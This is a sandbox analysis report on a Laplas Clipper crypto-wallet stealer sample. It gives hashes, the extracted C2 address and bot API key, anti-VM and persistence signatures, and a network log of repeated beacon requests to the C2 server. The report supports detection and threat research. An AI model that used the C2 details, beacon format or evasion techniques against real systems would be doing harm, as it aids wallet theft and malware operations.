Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    270s
  • max time network
    286s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    21/07/2023, 00:18 UTC

General

  • Target

    613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe

  • Size

    3.2MB

  • MD5

    4472444218925ed8fd4982f141af1978

  • SHA1

    101ff99cec2f571002915f23290d495671967db3

  • SHA256

    613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c

  • SHA512

    b2255bced17a9cf9ab8afb461cea7005d2df77984f3122609d82d9a2f7f5ec3ca23ee8f20f609e60937db134ef721bf90fd759ddbe4df9acbf6216d8d2e15cff

  • SSDEEP

    98304:iiuvmFRChTCXAVCAujVcbeyLwQ5ltcD6VIl:VRI8AaadcDhl

Malware Config

Extracted

Family

laplas

C2

http://168.100.10.236

Attributes
  • api_key

    f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
    "C:\Users\Admin\AppData\Local\Temp\613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2580

Network

  • flag-nl
    GET
    http://168.100.10.236/bot/regex
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:18:59 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:18:59 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/regex
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:20:04 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:20:04 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/regex
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:21:10 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:21:10 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/regex
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:22:16 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:22:16 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/regex
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:23:23 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin
    ntlhost.exe
    Remote address:
    168.100.10.236:80
    Request
    GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
    Host: 168.100.10.236
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 21 Jul 2023 00:23:23 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • 168.100.10.236:80
    http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin
    http
    ntlhost.exe
    2.7kB
    6.6kB
    27
    31

    HTTP Request

    GET http://168.100.10.236/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin

    HTTP Response

    200
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    728.2MB

    MD5

    c03a56a67a089c6c0ed7cc93654ae263

    SHA1

    16113fdafe44cfcc4a93507f3602b9f7652ae976

    SHA256

    26892056ce7e92cf839c76b09a2caa4510f326d812a6677c2f5dc3e61900b45e

    SHA512

    02ccd1e7fc5c7564e2fc6587d495c83da61df5319cb9bbdc38c81371dbdafa2c3bfc7360831c79d0a654d9adf443aece6dd9b5c11d4b83ce177e4caf7c7a0400

  • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    728.2MB

    MD5

    c03a56a67a089c6c0ed7cc93654ae263

    SHA1

    16113fdafe44cfcc4a93507f3602b9f7652ae976

    SHA256

    26892056ce7e92cf839c76b09a2caa4510f326d812a6677c2f5dc3e61900b45e

    SHA512

    02ccd1e7fc5c7564e2fc6587d495c83da61df5319cb9bbdc38c81371dbdafa2c3bfc7360831c79d0a654d9adf443aece6dd9b5c11d4b83ce177e4caf7c7a0400

  • memory/1700-58-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-65-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-54-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-59-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-60-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-61-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-64-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-57-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-63-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-62-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-55-0x0000000077C40000-0x0000000077DE9000-memory.dmp

    Filesize

    1.7MB

  • memory/1700-68-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-56-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-70-0x0000000028420000-0x0000000028BE1000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-72-0x00000000001C0000-0x0000000000981000-memory.dmp

    Filesize

    7.8MB

  • memory/1700-73-0x0000000077C40000-0x0000000077DE9000-memory.dmp

    Filesize

    1.7MB

  • memory/2580-86-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-98-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-77-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-79-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-78-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-80-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-81-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-83-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-82-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-84-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-75-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-85-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-87-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-88-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-89-0x0000000077C40000-0x0000000077DE9000-memory.dmp

    Filesize

    1.7MB

  • memory/2580-90-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-91-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-92-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-95-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-96-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-97-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-76-0x0000000077C40000-0x0000000077DE9000-memory.dmp

    Filesize

    1.7MB

  • memory/2580-99-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-100-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-101-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-102-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-103-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-104-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-105-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-106-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-107-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-108-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-109-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-110-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-111-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-112-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-113-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-114-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-115-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-116-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

  • memory/2580-117-0x0000000000E10000-0x00000000015D1000-memory.dmp

    Filesize

    7.8MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.